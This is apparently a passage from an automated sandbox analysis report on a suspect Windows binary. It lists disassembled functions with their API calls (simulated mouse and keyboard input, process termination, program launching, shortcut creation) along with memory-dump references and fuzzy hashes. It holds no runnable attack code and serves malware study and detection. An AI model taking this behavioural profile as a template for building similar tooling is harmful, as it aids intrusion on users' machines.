                                                                                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00772E3C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                              • Opcode ID: 10533c063e4a1dcc06662cbc26a46438070daa99ae48fe65406bf481e2c7f319
                                                                                                                                                                                                                                                                              • Instruction ID: c45ba662d0452eff7c15c1ac4db86ab0c5c36b421eb009f4c1f0f39a3e3dfe4c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10533c063e4a1dcc06662cbc26a46438070daa99ae48fe65406bf481e2c7f319
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1312272605315AFCB20DF14C848F9BB7A9FF84394F00491AF89997182DB78E949CBD2
                                                                                                                                                                                                                                                                              Function 007555E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 007555F9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00755616
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0075564E
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075566C
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00755674
                                                                                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 0075567E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 72514467-0
                                                                                                                                                                                                                                                                              • Opcode ID: 7bb9f864f8dcedbe14a4d08fa5e2589c72de3b8b6cb18383ed74eeb6571f132e
                                                                                                                                                                                                                                                                              • Instruction ID: c6780d963c4ddab7ff387be58be75c842c1ae3ed82ad93a9e269b9e609d9b26b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bb9f864f8dcedbe14a4d08fa5e2589c72de3b8b6cb18383ed74eeb6571f132e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2210432204644BBEB255B28DC59EBF7BA9DF44B61F148029FC05CA0D1EEADCC8197A0
                                                                                                                                                                                                                                                                              Function 00766263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007662C0
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 007663DA
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 007663F3
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00766411
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                                                                                              • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                              • Opcode ID: 80402f2603d854ace3c615e77aa0178a39ed2934fb577027b138b999cd5ca60d
                                                                                                                                                                                                                                                                              • Instruction ID: 827cf6aca259a949f54c4a5382d559e305bf60c2b66905aef75f751bbffa5254
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80402f2603d854ace3c615e77aa0178a39ed2934fb577027b138b999cd5ca60d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7D15271A043059FCB14DF25C484A2ABBE6FF89714F54889CF9869B362CB35EC45CB92
                                                                                                                                                                                                                                                                              Function 007136F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,007136E9,00713355), ref: 00713700
                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0071370E
                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00713727
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,007136E9,00713355), ref: 00713779
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                              • Opcode ID: 223729a07d19864eb147bb1f60fcfc5f9a063c1f4ec9d4051c950d469c4361ac
                                                                                                                                                                                                                                                                              • Instruction ID: 3b5ff75456c121cdce76ebfbf31ab8f6b71ced74cd55e1c058dd2695bf636dac
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 223729a07d19864eb147bb1f60fcfc5f9a063c1f4ec9d4051c950d469c4361ac
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC01B1B665A311AEA7343ABCBCCAAE62A94EB157767204339F110510E1FE5D4D829248
                                                                                                                                                                                                                                                                              Function 007230E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00714D53,00000000,?,?,007168E2,?,?,00000000), ref: 007230EB
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072311E
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723146
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00723153
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 0072315F
                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 00723165
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                              • Opcode ID: 69d1edf905eda244720f3ad38916ff21dd98beb500ab53790429a6de5a2e05f3
                                                                                                                                                                                                                                                                              • Instruction ID: fbc203dac2f2b71182163f3780d66ad37a0f19f9231b04754e10518d2af3ff82
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69d1edf905eda244720f3ad38916ff21dd98beb500ab53790429a6de5a2e05f3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF0F436644938B6C2223739BC0EF5A136A9FC1770B314129F924922D2EE2CCE138161
                                                                                                                                                                                                                                                                              Function 00789480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006F1F87
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1F96
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: BeginPath.GDI32(?), ref: 006F1FAD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1FD6
                                                                                                                                                                                                                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007894AA
                                                                                                                                                                                                                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 007894BE
                                                                                                                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007894CC
                                                                                                                                                                                                                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 007894DC
                                                                                                                                                                                                                                                                              • EndPath.GDI32(?), ref: 007894EC
                                                                                                                                                                                                                                                                              • StrokePath.GDI32(?), ref: 007894FC
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6da1a20e5c5c96a83b1897d71837abb57260e4a9cfd5c957d546863c41649ec7
                                                                                                                                                                                                                                                                              • Instruction ID: c968b8bed5fb901f0774b7bcf3524bade7e2547ada5ad74961524b77bb957717
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6da1a20e5c5c96a83b1897d71837abb57260e4a9cfd5c957d546863c41649ec7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C116D7204014CBFDF12AF90DC88EAA7F6DEF08360F14C011FA095A1A1D775AD56DBA4
                                                                                                                                                                                                                                                                              Function 006F327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006F32AF
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 006F32B7
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006F32C2
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006F32CD
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 006F32D5
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 006F32DD
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                              • Opcode ID: 938776616f33c1a3c34358b5e54858ab0710c29bde8181a55760ab31f636b8c8
                                                                                                                                                                                                                                                                              • Instruction ID: 16f8816581b8d4e649bfa8bc219f12908c0d866d740bf3ab5a6eb054932812cc
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 938776616f33c1a3c34358b5e54858ab0710c29bde8181a55760ab31f636b8c8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9016CB09417597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5AC64CBE5
                                                                                                                                                                                                                                                                              Function 0075F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0075F447
                                                                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0075F45D
                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0075F46C
                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0075F47B
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0075F485
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0075F48C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                                                                                                                              • Opcode ID: cefff93eeaacaf9f5e25a1e85347a98dee968ff9382a3b7563df255f80b95d14
                                                                                                                                                                                                                                                                              • Instruction ID: 4186bdd69015f38bfa4de658ef632c32710044baa4015ba32803bb7f92b98945
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cefff93eeaacaf9f5e25a1e85347a98dee968ff9382a3b7563df255f80b95d14
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBF01D32681158BBE73157929C0EEEB3B7CEFC6B51F104058F601910D0E6A85E01D7B9
                                                                                                                                                                                                                                                                              Function 007334D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?), ref: 007334EF
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00733506
                                                                                                                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00733512
                                                                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00733521
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00733533
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 0073354D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 272304278-0
                                                                                                                                                                                                                                                                              • Opcode ID: 1db3ff790e6bca94c9964bf530d2dceda1571bea4debbf5a85e7efed3d07e479
                                                                                                                                                                                                                                                                              • Instruction ID: 4431bf218802de4fecc8ad1580940aa896ab20d01bae31886e55d7d0f4b8fc42
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1db3ff790e6bca94c9964bf530d2dceda1571bea4debbf5a85e7efed3d07e479
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06014B31540119EFEB605FA4DC08FE97BB2FF04321F614161FA1AA21E1DB391E62AF14
                                                                                                                                                                                                                                                                              Function 007521C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007521CC
                                                                                                                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 007521D8
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007521E1
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007521E9
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007521F2
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007521F9
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                                                                                                                                                              • Opcode ID: fd817ba083a23be9be7b83a910476f2796a956f7e518a43110d92718ece644a1
                                                                                                                                                                                                                                                                              • Instruction ID: a9cb9bc2d2fb8c8791a025147d8696f11e6a7f7ac18d8a73e9e83649133927c3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd817ba083a23be9be7b83a910476f2796a956f7e518a43110d92718ece644a1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CE0E576084109FBDB112FE1EC0CD0ABF39FF49322B218220F225824B4CB369C20EB58
                                                                                                                                                                                                                                                                              Function 0077B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0077B903
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • GetProcessId.KERNEL32(00000000), ref: 0077B998
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077B9C7
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                              • String ID: <$@
                                                                                                                                                                                                                                                                              • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                              • Opcode ID: 0612c82aa6e74fee5cf6a7735ccb9d54ee24b7bfec8cda4345bb71c1c813cebb
                                                                                                                                                                                                                                                                              • Instruction ID: 5f5466b06a1a8dd5f9e3e3f79cb241ca8cec2af3d96e7c7fa4951442d3b9a9f7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0612c82aa6e74fee5cf6a7735ccb9d54ee24b7bfec8cda4345bb71c1c813cebb
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71715774A00219DFCF10DF64C494AAEBBF5BF08310F048499E959AB292CB78ED45CF95
                                                                                                                                                                                                                                                                              Function 00784818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
